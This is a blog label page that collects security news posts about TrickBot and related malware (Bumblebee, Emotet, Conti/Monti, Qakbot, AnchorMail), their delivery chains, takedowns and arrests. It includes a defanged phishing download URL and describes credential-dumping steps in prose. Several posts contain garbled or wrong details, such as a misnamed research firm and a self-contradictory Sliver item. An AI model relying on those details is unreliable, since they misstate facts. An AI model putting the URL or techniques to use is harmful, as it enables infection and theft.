Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label TrickBot. Show all posts

Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

iThe Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.

Conti Gang Doppelganger Adopts Recycled Code 

A ransomware attack from a brand-new gang dubbed 'Monti,' which primarily exploits Conti code has come to the surface. 

The Monti ransomware was found and revealed by MalwareHunterTeam on Twitter on June 30, but Intel471 and BlackBerry independently announced their study into Monti on September 7th.

The malware's developers constitute a well-known ransomware group that has launched numerous attacks. They operate under "Wizard Spider" and could be linked with the global Trickbot cybercrime ring. 

Reportedly, the cybercrime group that has a base in Russia, supports the Russian government's goals, particularly the Ukraine conflict. 

In return for a portion of the ransom money collected, the Conti gang offers 'its members' access to its software. The group's ability to scale operations is a direct result of the aforementioned. The group resorts to the ransomware as a service (RaaS) approach to disseminate the infection.

According to Intel471, "Monti might be a rebranded version of Conti or even a new ransomware version that has been developed utilizing the disclosed source code," it was published on February. It really doesn't appear like Monti has been involved in enough activities for the security company to establish a connection to Conti." 

Since the Conti disclosures in February effectively handed Monti malicious actors a step-by-step roadmap to mimicking Conti's notoriously successful actions, BlackBerry appears to be more certain that Monti is a copycat than a legitimate successor to its namesake.

Apart from one, Monti threat actors used the Action1 Remote Monitoring and Maintenance (RMM) agent, and the majority of Indicators of Compromise (IOCs) discovered by the BlackBerry IR team in the Monti attack were also detected in prior Conti ransomware attacks. 

Experts want to highlight a useful technique that was made feasible by our awareness of the code repetition before  Monti's reuse of Conti's encryptor code. 

The BlackBerry IR team was aware that Conti encryptor payloads do not always completely encrypt each file because we were familiar with Conti v2 and v3 encryptor payloads. Source code research reveals that Conti payloads combine a file's location, type, and size to decide which encryption techniques to employ. 

The BlackBerry IR team was able to recover completely, unencrypted strings from encrypted log files because of this information.

Conti's activities have slowed down recently, some experts have proposed that Conti's reduced activity is the consequence of a rebranding effort similar to those undertaken by various ransomware strains in the past, perhaps involving several members of the Conti gang. Other sources claim that other RaaS firms, like Karakurt and BlackByte, have engaged former Conti operators.

Whether Conti is being dubbed Monti to spoof the earlier strain or it is simply another new ransomware variety remains unclear, we will probably continue to see this new version have an impact on organizations all around the world. However, utilizing publicly accessible binaries to develop fresh ransomware or relaunch an old one would potentially offer defenders a head start as Monti develops.





Upcoming Crimeware is Driven by Cobalt Strike

Threat actors are transitioning away from the Cobalt Strike suite of penetration testing tools in favor of less well-known frameworks that are similar.

Sliver, an open-source, cross-platform kit, is emerging as a viable replacement for Brute Ratel. Utilizing research queries derived by examining the toolkit, how sliver functions, its components, and malicious activity using it can be found.

Cobalt Strike, a toolkit enabling attackers to deploy "beacons" on compromised machines to conduct remote network surveillance or issue instructions, has long been one of the most well-liked tools in red team engagements.

Hackers are attempting various methods that can avoid Endpoint Detection and Response (EDR) and antivirus solutions because defenders have learned to detect and block assaults depending on this toolkit.

Hackers have developed alternatives as Cobalt Strike's defenses have gotten stronger. They switched to Brute Ratel, an adversarial attack simulation program meant to avoid security products, as seen by Palo Alto Networks.

According to a Microsoft analysis, hackers of all stripes—from state-sponsored organizations to cybercrime gangs—are increasingly employing the Go-based Sliver security testing tool created by experts at BishopFox cybersecurity firm in their attacks.

Microsoft tracks one group that adopted Sliver as DEV-0237. The gang, also known as FIN12, has been connected to several ransomware developers. The gang in the past, has used malware, such as TrickBot, to spread ransomware payloads from other ransomware operators.

State-sponsored actors in Russia, especially APT29 also known as Cozy Bear, The Dukes, and Grizzly Steppe, have reportedly also used Sliver to keep access to compromised environments, according to a report from the UK's Government Communications Headquarters (GCHQ).

Microsoft says that Sliver has been used in more recent attacks in place of BazarLoader using the Bumblebee (Coldtrain) malware loader, which is connected to the Conti syndicate.

Defenders can utilize Microsoft's set of tactics, techniques, and procedures (TTPs) to recognize Sliver and other new C2 frameworks. Hackers can set up listeners to detect anomalies on the network for Sliver infrastructure because the Sliver C2 network supports several protocols DNS, HTTP/TLS, MTLS, and TCP, accepts implants/operator connections, and can host files to imitate legitimate web servers.

Microsoft also provided details on how to recognize Sliver payloads produced from the C2 framework's official, unmodified source.

Microsoft advises removing configurations when they are put into memory for Sliver malware payloads that don't have a lot of contexts because the framework needs to de-obfuscate and decrypt them in order to use them.


Networks Breached via Bumblebee Loader


The Bumblebee loader is increasingly being used by hackers linked to the IcedID, TrickBot, and BazarLoader malware to infiltrate target networks and carry out additional post-exploitation operations.

When Google's Threat Analysis Group (TAG) exposed the actions of an initial access broker named Exotic Lily with connections to the TrickBot and the bigger Conti collectives in March 2022, Bumblebee initially came to light.

What is Bumblebee?

Researchers discovered that Bumblebee is a successor for the malware known as BazarLoader, which previously distributed the Conti ransomware.

Spam emails are where the Bumblebee virus first appears. The malicious Dynamic Link Library (DLL) file is finally dropped by the ISO file that can be downloaded using the link in this email. On the victim's computer, the DLL file continues to load Bumblebee's ultimate payload.

An identical replica of the data found on an optical disc, such as a CD or DVD, is stored in an archive file called an ISO file. They are primarily employed to distribute huge file sets intended for burning onto optical discs or backup optical discs.

Analysis by experts 

According to Cybereason, most Bumblebee infections were initiated by end users executing LNK files, which load the malware via a system binary.

As per experts from Cybereason Meroujan Antonyan and Alon Laufer, "the virus is distributed by phishing emails with an attachment or a link to the malicious archive containing Bumblebee."

Bumblebee operators apparently did extensive surveillance after system compromise and diverted command execution output to files for exfiltration.

The loader is launched using the command found in the LNK file, which serves as a conduit for subsequent steps including persistence, privilege escalation, reconnaissance, and data theft.

After attaining elevated access to infected endpoints, the threat actor also uses the Cobalt Strike adversary simulation framework to move laterally throughout the network. By deploying AnyDesk remote desktop software, persistence is achieved.

The technical report stated that the hackers 'disrupted Active Directory and used confidential data such as users' logins and passwords for lateral movement. Less than two days passed between the initial access and the compromising of Active Directory.

Cybereason asserts that Bumblebee needs to be handled as a serious threat due to the attack's proactivity.


New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to capture credit card information from Google Chrome user accounts. 

After obtaining credit card information (such as name, expiration month and year, and card numbers), the malware will transfer it to command-and-control (C2) servers that are not the same as those used by the Emotet card stealer module. 

The Proofpoint Threat Insights team said, "On June 6th, Proofpoint observed a new Emotet module being dropped by the E4 botnet. To our surprise, it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader." 

This shift in behaviour follows an increase in activity in April and a move to 64-bit modules, as discovered by the Cryptolaemus security research group. One week later, Emotet began using Windows shortcut files (.LNK) to run PowerShell instructions on victims' devices, abandoning Microsoft Office macros, which were disabled by default beginning in early April 2022. 

The re-emergence of Emotet malware:

In 2014, the Emotet malware was created and used in assaults as a banking trojan. It has developed into a botnet used by the TA542 threat group (also known as Mummy Spider) to deliver second-stage payloads. 

It also enables its operators to steal user data, conduct reconnaissance on compromised networks, and migrate laterally to susceptible devices. Emotet is renowned for deploying Qbot and Trickbot malware trojan payloads on infected PCs, which are then used to spread more malware, such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet's infrastructure was destroyed in early 2021 as part of an international law enforcement operation that also resulted in the arrest of two people.

When Emotet research organisation Cryptolaemus, computer security firm GData, and cybersecurity firm Advanced Intel all spotted the TrickBot malware being used to deliver an Emotet loader in November 2021, the botnet returned utilising TrickBot's previously established infrastructure.

According to ESET, Emotet's activity has increased more than 100-fold since the beginning of the year, with its activity rising more than 100-fold against T3 2021.

Data Stolen From Parker Hannifin was Leaked by the Conti Gang

 

Several gigabytes of data allegedly taken from US industrial components major Parker Hannifin have been leaked by a known Conti gang. Parker Hannifin is a motion and control technology business which specializes in precision-built solutions for the aerospace, mobile, and industrial industries. 

The Fortune 250 business said in a legal statement on Tuesday, the compromise of its systems was discovered on March 14. Parker shut down several systems and initiated an inquiry after detecting the incident. Law enforcement has been alerted, and cybersecurity and legal specialists have been summoned to help. Although the investigation is ongoing, the company announced some data, including employee personal information, was accessed and taken. 

"Relying on the Company's early evaluation and currently available information, the incident has had no major financial or operational impact, and the Company does not think the incident will have a significant impact on its company, operations, or financial results," Parker stated. "The Company's business processes are fully operating, and it retains insurance, subject to penalties and policy limitations customary of its size and industry." 

While the company has not shared any additional details regarding the incident, cybersecurity experts have learned the infamous Conti gang has taken credit for the Parker breach. More than 5 GB of archive files supposedly comprising papers stolen from Parker have been leaked by the hacker group. However, this could only be a small percentage of the data they've obtained; as per the Conti website, only 3% of the data theft has been made public. Usually, hackers inform victims they must pay millions of dollars to restore encrypted files and avoid stolen information from being leaked. 

Conti ransomware is a very destructive malicious actor because of how quickly it encrypts data and transfers it to other computers. To gain remote access to the affected PCs, the organization is using phishing attempts to deploy the TrickBot and BazarLoader Trojans. The cyber-crime operation is said to be led by a Russian gang operating under the Wizard Spider moniker and members of Conti came out in support of Russia's invasion of Ukraine in February.

Conti data, such as malicious source code, chat logs, identities, email addresses, and C&C server details, have been disclosed by someone pretending to be a Ukrainian cybersecurity researcher. Conti works like any other business, with contractors, workers, and HR issues, as revealed by the released documents. Conti spent about $6 million on staff salaries, tools, and professional services in the previous year, according to a review conducted by crisis response firm BreachQuest.

Conti and other ransomware organizations continue to pose a threat to businesses and ordinary services, and measures should be taken to help prevent a severe cyberattack.

CISA Updates Conti Ransomware Alert with Around 100 Domain Names

 

The US Cybersecurity and Infrastructure Security Agency (CISA) has upgraded the Conti ransomware advisory to include indications of compromise (IoCs) that comprise almost 100 domain names utilized in criminal operations. 

The advisory, which was first issued on September 22, 2021, contains facts about Conti ransomware assaults that attacked organizations in the United States, as observed by CISA and the Federal Bureau of Investigation (FBI). It's worth noting that the US Secret Service's data is included in the latest cybersecurity advisory. Internal data from the Conti ransomware operation began to surface at the end of February after the group publicly declared their support for Russia in the Ukraine invasion. 

The leak came from a Ukrainian researcher, who originally issued private messages exchanged by the members of the group and then released the source code for the ransomware, administrative panels, and other tools. Domains used in compromises with BazarBackdoor, the malware used to gain initial access to networks of high-value targets, were also found in the cache of data. Conti, according to CISA, has infiltrated over 1,000 businesses around the world, with TrickBot malware and Cobalt Strike beacons being the most common attack vectors. 

The agency has published a list of 98 domain names that have "registration and naming characteristics identical" to those used in Conti ransomware attacks. While some of the domains were used in malicious operations, the agency warns that others of them may be abandoned or may share similar features coincidentally. The list of domains linked to Conti ransomware assaults does not appear to be the same as the hundreds of domains released from BazarBackdoor infections by the Ukrainian researcher. 

Conti did not halt its activities despite the negative attention it earned recently as a result of the exposure of its internal discussions and tools. Conti has listed more than two dozen victims on its website since the beginning of March in the United States, Canada, Germany, Switzerland, the United Kingdom, Italy, Serbia, and Saudi Arabia.

The Emotet Malware is Alive and Using TrickBot to Rebuild its Botnet

 

The malicious Emotet botnet, which made a comeback in November 2021 after a 10-month break, is showing indications of steady expansion once again, collecting a colony of over 100,000 infected hosts to carry out its destructive actions. 

In a new round of attacks, Emotet, a Banking Trojan which has evolved into a formidable modular threat, has reappeared with improved features. It has infected devices to carry out additional spam campaigns and install various payloads like the QakBot (Qbot) and Trickbot malware. These payloads would subsequently be utilized to give threat actors, such as Ryuk, Conti, ProLock, Egregor, and others, early access to deploy ransomware. 

"While Emotet has not yet reached the same magnitude as before, the botnet is displaying a strong resurrection with a total of around 130,000 unique bots scattered over 179 countries since November 2021," Lumen's Black Lotus Labs researchers wrote in a report. On April 25th, 2021, German law enforcement used the network to send an Emotet module that removed the malware from afflicted devices. 

The TrickBot malware has begun to dump an Emotet loader on affected devices, according to Emotet research group Cryptolaemus, GData, and Advanced Intel. While Emotet used to deploy TrickBot, the threat actors now use a mechanism called "Operation Reacharound" by the Cryptolaemus group, which rebuilds the botnet utilizing TrickBot's current infrastructure. 

Apart from command-and-control (C2) lists and RSA keys, which change from version to version, Emotet's main payload hasn't changed much, but the list of phrases used to establish a process name for its bot has been renewed. Along with new binaries, words like engine, finish, magnify, resapi, query, skip, and many more are utilized and modified. Researchers may be able to construct signatures to detect Emotet infections on machines once these lists have been secured, but signature-based detection is more challenging if the list changes. 

Abuse.ch has published a list of the new Emotet botnet's command and control servers and strongly advises network administrators to ban the linked IP addresses. Another new feature is the ability to collect extra system information from compromised workstations in addition to a list of running processes. The number of bots and associated dispersion are crucial indicators of Emotet's success in reconstructing its once-vast infrastructure.

AnchorDNS Loophole of a TrickBot Spyware Upgraded to AnchorMail

 

Even after the TrickBot infrastructure was shut down, the malware's operators continued to improve and retool its arsenal in preparation for attacks which ended in the distribution of the Conti ransomware. The new, improved edition of the criminal gang's AnchorDNS backdoor was called AnchorMail by IBM Security X-Force, which discovered it. 

According to IBM's malware reverse researcher Charlotte Hammond, AnchorMail "uses an email-based [command-and-control] server with which it connects using SMTP and IMAP protocols over TLS." "AnchorMail's behavior is essentially similar to vs its AnchorDNS predecessor, excluding the redesigned C2 communication method." 

The Trickbot Group, also known as ITG23 on X-Force, is a cybercriminal group best known for creating the Trickbot financial Trojan. Originally discovered in 2016, it was used to aid online banking fraud, initially. The gang adapted to the ransomware economy by gaining a footing for ransomware assaults utilizing its Trickbot and Bazarloader payloads, a tight partnership with both the Conti ransomware-as-a-service provider (RaaS). 

ITG23 is also known for creating the Anchor malware framework, which includes the AnchorDNS variant. In 2018 various high-profile targets were being infected with Trickbot or Bazarbackdoor, another ITG23 backdoor. AnchorDNS is known for using the DNS protocol to communicate with its Command and Control (C2) server. The improved backdoor, dubbed AnchorMail or Delegatz by IBM Security X-Force researchers, now communicates with an email-based C2 server through SMTP and IMAP protocols via TLS. AnchorMail's functionality is essentially similar to its AnchorDNS predecessor for most of its part, with the exception of the redesigned C2 communication mechanism. 

The uncovering of this updated Anchor variant adds an extra inconspicuous backdoor during ransomware assaults, demonstrating the group's drive to continually improve its malware. AnchorMail provides a scheduled job for persistence after execution, which is set to execute every 10 minutes. It then gathers basic system data, registers with its C2, and enters a loop of monitoring for and executing commands received. 

The command structure of the backdoor and AnchorDNS appear to be fairly similar, and both forms appear to accept the same set of control codes, which allow a variety of various possibilities for processing orders and payloads received from the C2. The commands include the ability to run binaries, DLLs, and shellcode downloaded from a remote server, as well as launch PowerShell commands and erase themselves from infected PCs. 

"The revelation of this new Anchor version adds a new covert gateway used during ransomware assaults, AnchorMail has only been seen to target Windows PCs so far. However, given the AnchorDNS has been adapted to Linux, a Linux-based version of AnchorMail appears inevitable," said Charlotte Hammond, BM's malware reverse engineer.

TrickBot Group Likely Moving Operations to Switch to New Malware

 

TrickBot, the notorious Windows crimeware-as-a-service (CaaS) solution used by several threat actors to distribute next-stage payloads like ransomware, looks to be in the midst of a transition, with no new activity since the beginning of the year. 

Researchers at Intel 471 stated in a study provided with The Hacker News that the slowdown in malware activities is partially due to a huge shift by Trickbot's operators, including working with the operators of Emotet. Even as the malware's command-and-control (C2) infrastructure continued to serve additional plugins and web injects to infected nodes in the botnet, the last round of TrickBot attacks was recorded on December 28, 2021. 

Surprisingly, the drop in campaign volume has coincided with the TrickBot gang collaborating closely with the operators of Emotet, which resurfaced late last year after a 10-month break due to law enforcement efforts to combat the malware. The attacks, which began in November 2021, comprised an infection sequence that utilized TrickBot to download and execute Emotet binaries, whereas Emotet binaries were frequently used to drop TrickBot samples previous to the shutdown. 

The researchers stated, "It's likely that the TrickBot operators have phased TrickBot malware out of their operations in favour of other platforms, such as Emotet. TrickBot, after all, is relatively old malware that hasn't been updated in a major way." 

Additionally, immediately after Emotet's comeback in November 2021, Intel 471 discovered instances of TrickBot sending Qbot installs to the infected systems, highlighting the possibility of a behind-the-scenes shake-up to relocate to other platforms. With TrickBot becoming more visible to law enforcement in 2021, it's not unexpected that the threat actor behind it is actively working to change tactics and modify their protective mechanisms. 

"Perhaps a combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it. We suspect that the malware control infrastructure (C2) is being maintained because there is still some monetization value in the remaining bots," the researchers added.

According to a separate investigation published last week by Advanced Intelligence (AdvIntel), the Conti ransomware group is thought to have acqui-hired several elite TrickBot developers to deactivate the malware and replace it with improved variations like BazarBackdoor.

Trickbot has Corrupted over 140,000 Devices

 

As per cyber threat intelligence firm Test Level Analysis (CPR), Trickbot, a financial Trojan infection that targets businesses and consumers for personal data, has infected over 140,000 devices belonging to customers of Amazon, Microsoft, Google, and 57 other organizations since November 2020. The investigation focuses on Trickbot, a well-known banking Trojan that was first discovered in 2016 and has since expanded into a botnet, ransomware, and malware ecosystem.

Threat actors have frequently used the bedfellows to mount multiple attacks in the past. TrickBot was frequently provided as a payload in specialized email phishing attacks by Emotet, though TrickBot has also delivered Emotet samples — the hazardous scenario at hand currently.

CPR has detected how Trickbot's writers are targeting high-profile individuals in order to steal and corrupt valuable sensitive data. At the same time, everyone should understand the people in charge of the infrastructure are highly skilled in virus development. Trickbot is mostly used to steal financial information, account credentials, personally identifying information, and even bitcoin. It's a modular malware that can be adapted to a variety of different use scenarios, which makes it far more dangerous.

More than 140,000 devices infected, according to Alexander Chailytko, Check Point's cybersecurity, research, and innovation manager, seem to be mostly computers belonging to the general population, as well as "some companies." The data gathered represents telemetry which has been obtained from its clients, however, it is "greater than" 140,000. As a result, the security vendor may have more or less visibility in specific parts of the world, according to Chailytko. 

"Trickbot has affected one out of every 45 enterprises. Over the previous few months, we've noticed a decrease in Trickbot campaign activity," the cybersecurity researcher stated. Users may defend it against Trickbot by only opening documents from reputable sources, using separate unique passwords profiles, and updating similar functionality and antivirus updated with the latest.  

Attackers are Using Shipment-Delivery Scams to Lure Victims to Install Trickbot

 

Researchers discovered that threat actors are increasingly deploying scams that impersonate package couriers such as DHL or the United States Postal Service in authentic-looking phishing emails to trick victims into downloading credential-stealing or other malicious payloads. Separately on Thursday, researchers from Avanan, a CheckPoint firm, and Cofense identified current phishing scams that involve malicious links or attachments aimed at infecting computers with Trickbot and other harmful malware. 

Researchers stated the campaigns relied separately on faith in commonly used shipping methods and employees' familiarity with receiving emailed documents linked to shipments to try to provoke further action to hack corporate systems. 

The emails used to send Trickbot in recent delivery service-related campaigns included official USPS branding as well as features such as third-party social-media logos from Facebook, Instagram, LinkedIn, and Twitter, "to make the email look even more credible," researchers said. The emails, however, have a sender address that is totally irrelevant to the USPS, which might easily have alerted someone to their shady motive, they claim.

If the bait works and a user clicks on the link to the alleged invoice, they are routed to a domain that downloads a ZIP file, hxxps:/www.zozter[.]com/tracking/tracking[.]php. The unzipped file is an XMLSM spreadsheet called “USPS_invoice_EA19788988US.xlsm” that requires editing due to document protection — a common approach used in fraudulent email campaigns. If a victim goes so far as to enable editing, a malicious PowerShell process is launched, which eventually downloads Trickbot. 

According to Avanan's Jeremey Fuchs, cybersecurity researcher, and analyst, the DHL spoofing assault likewise includes what threat actors want victims to believe is a shipping document, but this time in the form of an attachment. “By spoofing a popular brand, the hackers are hoping to target vulnerable users who are accustomed to checking for shipping notifications,” he wrote. 

This practice has become so widespread that DHL has achieved the dubious distinction of replacing Microsoft at the top of Check Point Software's list of brands most mimicked by threat actors in the fourth quarter of 2021. Scams involving the courier accounted for 23% of all phishing emails during that time period, but the company's name was associated with only 9% of scams in the third quarter. 

Researchers attributed the increase in package delivery frauds to a number of variables. Spoofing DHL made perfect sense in the fourth quarter of last year during the hectic holiday shopping season, according to Jeremey, in a study on the latest DHL-related fraud published Thursday.

This Decade-old Malware has Picked Some Nasty New Tactics

 

Qakbot, a popular trojan for stealing bank credentials, has recently started delivering ransomware, making it more difficult for network defenders to identify what is and isn't a Qakbot attack. 

Qakbot is a particularly versatile piece of malware that has been active for over a decade and has survived despite Microsoft and other security firms' multi-year attempts to eliminate it. In 2017, Qakbot adopted WannaCry's lateral movement techniques, such as infecting all network shares and drives, brute-forcing Active Directory accounts, and creating copies of itself using the SMB file-sharing protocol. 

According to Kaspersky's new investigation of Qakbot, it is unlikely to go away very soon. As per its detection statistics for Qakbot, it infected 65 per cent more PCs between January and July 2021 than it did the previous year. As a result, it is becoming increasingly dangerous. 

Qakbot is modular, as per Microsoft, allowing it to masquerade as unique attacks on each device on a network, making it tough to identify, prevent, and remove by defenders and security tools. 

The Microsoft 365 Defender Threat Intelligence Team stated in its report, "Due to Qakbot's high likelihood of transitioning to human-operated attack behaviours including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely." 

Given the difficulty in identifying a common Qakbot campaign, the Microsoft team has profiled the malware's approaches and behaviours to aid security analysts in detecting it. Emailed attachments, links, or embedded images are the most common distribution methods. It is also known to attack machines using Visual Basic for Applications (VBA) macros and legacy Excel 4.0 macros. In July, TrendMicro examined a significant Qakbot campaign that employed this tactic. 

Qakbot hides harmful processes using process injection, creates scheduled activities that stay on the machine, and manipulates the Windows registry. Once installed on an infected system, it uses a variety of lateral movement techniques, as well as the Cobalt Strike penetration-testing framework and ransomware. 

Last year, the FBI warned that Qakbot trojans were spreading ProLock, a type of "human-operated ransomware." It was a concerning discovery since machines infected with Qakbot on a network must be separated because they act as a ransomware attack's bridge. Microsoft noted that Qakbot has used MSRA.exe and Mobsync.exe for process injection to conduct various network 'discovery' commands and steal Windows credentials and browser data. 

Other criminal groups can use Qakbot's Cobalt Strike module to deploy their own payloads, such as ransomware. As per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor, and ProLock (2020), and Sodinokibi/REvil (2021).

"Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads," Microsoft noted. 

"Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor." 

Activating Office 365 phishing protection, enabling SmartScreen and network in the Edge browser, and ensuring runtime macro scanning by turning on Windows Antimalware Scan Interface (AMSI) is among Microsoft's recommended mitigations to reduce Qakbot's impact. Microsoft Defender antivirus and other third-party antivirus vendors support AMSI. AMSI support for Excel 4.0 macros was added in March, so it's still a new feature.

Russian accused of developing programs for the Trickbot hacker network extradited from South Korea to US

 The US Department of Justice said that the Russian is a member of a hacker group that used the Trickbot malicious network. The network has been used to attack "millions of computers" around the world, including schools, banks, healthcare, energy and agricultural companies, the prosecution said.

According to the ministry's press release, 38-year-old Vladimir Dunaev and his accomplices stole money and confidential information from November 2015 until August 2020, and also damaged computer systems. Individuals, financial and state institutions, utilities and private enterprises are among the victims of the hackers' actions.

The US Department of Justice clarifies that Mr. Dunaev was allegedly one of the developers of malware for the Trickbot network. He was engaged in creating modifications for the browser and helped malicious software bypass security programs.

The Russian was extradited from South Korea to the United States last week, on October 20. He is charged with conspiracy to commit computer fraud and identity theft, conspiracy to commit information technology and banking fraud, and conspiracy to launder money. In total, more than 10 people are involved in the case, including four Russians and one Ukrainian.

In June, similar charges were brought against a citizen of Latvia, Anna Witte, whom the US Justice Department also considers a member of the hacker group that used Trickbot. This network, according to the American side, was located in Russia, Ukraine, Belarus and the Republic of Suriname (South America). The Washington Post wrote that Trickbot is allegedly controlled by Russian-speaking attackers. In November 2020, the network was disconnected, the American company Microsoft took part in the special operation.

Trickbot Uses New Distribution Mechanisms to Disseminate Malware

 

The creators of the harmful TrickBot malware have emerged with new tricks aimed at widening the malware's dissemination routes, eventually culminating to the deployment of ransomware like Conti. According to a report by IBM X-Force, the threat actor known as ITG23 and Wizard Spider has been discovered to collaborate with other cybercrime gangs known as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are relying on to deliver proprietary malware. 

TrickBot is a well-known banking Trojan that has been operating since October 2016, and its creators have kept it updated by adding new features. The botnet is still available via a multi-purpose malware-as-a-service (MaaS) model. Threat actors use the botnet to spread malware like Conti and Ryuk, which steals personal information and encrypts it. More than a million computers have been compromised by the Trickbot botnet so far. 

"These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said. 

Microsoft's Defender team, FS-ISAC, ESET, Lumen's Black Lotus Labs, NTT, and Broadcom's cyber-security division Symantec teamed forces in October to launch a concerted effort to shut down the infamous TrickBot botnet's command and control infrastructure. Despite the fact that Microsoft and its allies pulled the TrickBot infrastructure down, its operators sought to restart operations by bringing new command and control (C&C) servers online. 

In a malware campaign aimed at corporate users earlier this year, the cybercrime group used email campaigns to send Excel documents and a call center ruse known as "BazaCall." The gang formed a collaboration with two notable cybercrime affiliates in June 2021, which included the use of hijacked email threads and bogus website consumer inquiry forms.

"This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever," the researchers said. 

The Hive0107 affiliate is said to have adopted a new tactic in one infection chain observed by IBM in late August 2021, which involves sending email messages to target companies informing them that their websites have been performing distributed denial-of-service (DDoS) attacks on its servers, and urging the recipients to click on a link for more evidence. When the link is clicked, a ZIP archive containing a malicious JavaScript (JS) downloader is downloaded, which then contacts a remote URL to download the BazarLoader malware, which drops Cobalt Strike and TrickBot.

Alleged TrickBot Gang Member Arrested While Leaving South Korea




A Russian native – on accusations of being associated with the TrickBot cybercrime gang – was recently arrested by the authorities at Seoul International airport, while trying to leave South Korea. 

Reportedly, the Russian resident – identified as Mr. A by media –  was leaving for his home in Russia after waiting for over a year in the South Asian country. As per local media reports (Seoul's KBS) the alleged individual was prevented from leaving South Korea due to COVID-19 travel restrictions – international travel had been canceled by Seoul officials as the global pandemic broke out. Subsequently, Mr. A's passport expired, and he was stranded in South Korea as he waited to renew his passport. 

The Russian man who allegedly worked as a web browser developed for the malware spreading TrickBot gang in 2016 during his stay in Russia, denied 'being aware' of working for a cybercrime group. “When developing the software, the user manual did not identify malware,” said the individual at Seoul High Court. 

As per a Korean newspaper, on September 01, an interrogation was held at the 20th Criminal Division of the Seoul High Court – for the extradition request case against the alleged developer of the malware. While fighting the US extradition attempt, the lawyer of the accused argued that the US will prosecute the man unjustly. "If you send it to the United States, it will be very difficult to exercise your right of defense and there is a good chance that you will be subject to excessive penalties,” claimed the attorney. 

As per the reports, the suspect continued to maintain that the operation manual did not fall under malicious software when he developed the software. He received work from TrickBot via a job search site, following which he developed a web browser for the gang, according to The Record. Notably, the recruiters preferred applicants who did not ask a lot of questions. 

TrickBot is an advanced banking trojan that targets Windows machines. Initially created to steal the banking information of unsuspecting users, TrickBot has evolved over the last five years to be versatile, widely available, and easy to use. With new variants being increasingly released, TrickBot infections have become more frequent on home office networks; continuous advancement since its inception has cemented TrickBot's reputation as a highly adaptive modular malware.

TrickBot Employs Bogus 1Password Installer to Launch Cobalt Strike

 

The Institute AV-TEST records around 450,000 new critical programmings (malware) every day with several potentially unwanted applications (PUA). These are thoroughly examined by their team under characteristic parameters and classified accordingly. 

Malware is a networking-generated file or code that infects, scans, exploits, or practically performs any activity that an attacker desires. 

One such prevalent malware is Trickbot which was first seen in 2016. Trickbot has established itself in cyberspace as a modular and multipurpose malware. The Trickbot operators initially focused on bank credential theft operations and then expanded their skills to attack several industries. With further advancements Trickbot came to light for its participation in ransomware attacks, using Ryuk and Conti malware. 

Recently, it has been found that Trickbot employs a technique for installing a bogus "1Password password manager" to corrupt and collect data on the victim's PC. The first way to accomplish this is with a password-protected Microsoft Word or Excel archive file with macros, that will compromise the targeted device if activated. For criminals to accumulate information about several network computers, a bogus 1Password file installer with the title "Setup1.exe" is also commonly used to launch the Cobalt Strike. 

1Password is an AgileBits Inc. developed password manager. It offers users a place in the digital void that is secured with the master password of the PBKDF2, to hold several passwords, Software licenses, and additional confidential material. 

In the regard, the DFIR Report states, “The Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error reporting. The threat actor then utilized built-in Windows utilities such as net.exe, ipconfig.exe, and nltest.exe for performing internal reconnaissance. Within two minutes of the discovery activity, WDigest authentication was enabled (disabled by default in Windows 10) in the registry on the infected host. This enforces credential information to be saved in clear text in memory. Shortly after applying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump.” 

This same bogus installer also eliminates a file that enables the execution of the Cobalt Strike (CS) shellcode and hence receives CS beacons. As the program allows unauthorized connection to victim systems, PowerShell commands are being used to gather data about victim PCs, such as their “anti-virus state”. 

Cobalt Strike is a commercial penetration test framework that helps an agent called 'Beacon' to be deployed by an attacker on the victim's network. Beacon has a wide range of functions including command execution, keylogging, data transfer, SOCKS proxy, privilege scale, port scanning, and lateral movement. 

Meanwhile, as the researchers highlighted, the acquired material was not exfiltrated and the group's motifs remain uncertain. If more advancements are noted in the near future, they will continue to update everyone on it, said the researchers. 

Consequently, researchers in cybersecurity must look for approaches to make sure that their customer facilities are secure from these techniques, as the gang can restart an attack on other networks anytime.

Snake Keylogger: Enters Top 10 List for the Most Prominent Malwares

 

